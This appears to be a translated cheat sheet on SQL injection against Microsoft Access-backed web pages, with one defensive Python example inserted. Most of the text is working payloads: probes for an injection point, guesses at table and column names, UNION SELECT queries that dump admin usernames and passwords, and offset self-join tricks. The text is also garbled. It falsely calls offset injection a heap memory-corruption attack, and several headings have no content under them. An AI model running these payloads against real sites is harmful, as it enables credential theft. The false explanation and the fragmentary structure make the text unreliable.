Access injection

Introduction

Microsoft Office Access is a relational database management system published by Microsoft. It combines the Microsoft Jet Database Engine with a graphical user interface and is one of the programs in the Microsoft Office suite. In other words, Microsoft Office Access is Microsoft's database management system that bundles the database engine's graphical user interface together with software development tools.

Union injection

Union-based Access injection

Blind injection

Blind Access injection

Offset injection

Access offset injection

Identifying the injection point

'
and 1=1
and 1=2
or 1=1
or 1=2
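The boolean probes above only work because the request parameter is pasted straight into the SQL text. The following added example (not part of the original page) shows the vulnerable concatenation beside its parameterised replacement. It uses an in-memory SQLite database as a constructed stand-in for the Access/Jet back end; the assumption is that the same DB-API pattern applies unchanged to a pyodbc connection to an Access file, which also uses `?` placeholders.

```python
import sqlite3

# Constructed demo database (stand-in for the Access database the page discusses).
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news (id integer primary key, title text)")
    conn.executemany("insert into news values (?, ?)",
                     [(1513, "first"), (1514, "second"), (1515, "third")])
    conn.commit()
    return conn

def lookup_unsafe(conn, user_id):
    # Vulnerable: the raw request parameter is concatenated into the statement,
    # so a value such as "1513 and 1=2" becomes part of the WHERE clause logic.
    sql = "select id, title from news where id=" + user_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    # Hardened: validate the value as an integer, then bind it as a parameter.
    # Anything that is not a plain number is rejected instead of being parsed as SQL.
    try:
        id_value = int(user_id)
    except ValueError:
        return []
    return conn.execute("select id, title from news where id=?", (id_value,)).fetchall()

def demo():
    # Returns, for each probe value from the page, the row count produced by the
    # vulnerable and the hardened lookup: (unsafe_rows, safe_rows).
    conn = make_demo_db()
    results = {}
    for probe in ("1513", "1513 and 1=1", "1513 and 1=2", "1513 or 1=1"):
        results[probe] = (len(lookup_unsafe(conn, probe)), len(lookup_safe(conn, probe)))
    return results

if __name__ == "__main__":
    for probe, counts in demo().items():
        print(f"{probe!r:20} unsafe={counts[0]} safe={counts[1]}")
```

With concatenation, `and 1=2` empties the result and `or 1=1` returns every row, which is exactly the difference an attacker looks for when confirming an injection point; with the bound parameter the three malformed values are rejected and the legitimate value still returns its one row.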

Determining the database type

# access
and exists(select * from msysobjects) >0
# sql server
and exists(select * from sysobjects) >0

Enumerating the database (guessing table names)

and exists(select * from admin)

Enumerating columns (guessing column names)

and exists(select admin from admin)
and exists(select password from admin)

Determining the number of columns

order by 20
order by 30
order by 25

?id=1513 and exists(select * from admin order by 6)

Enumerating the columns that are displayed

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

Querying column contents

and 1=2 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

Offset injection (table name known, column names cannot be guessed)

Access offset injection (Access Offset Injection) is a technique aimed at memory corruption attacks, usually used to attack the heap memory structures of a program. The principle of this attack is to exploit mistakes the program makes when handling dynamically allocated memory (such as heap memory), and to access or modify memory regions that should not be directly accessible by altering offsets in memory.

An Access offset injection attack usually requires the following steps:

Payload for level-1 offset injection

Payload for level-2 offset injection

-- locate the column count at which `*` fits
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from admin
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,* from admin

-- offset calculation
-- 22-16=6

-- shift the output: use aliased self-joins to nest the table contents
-- 10+6*2=22
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

-- 4+6*3=22
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)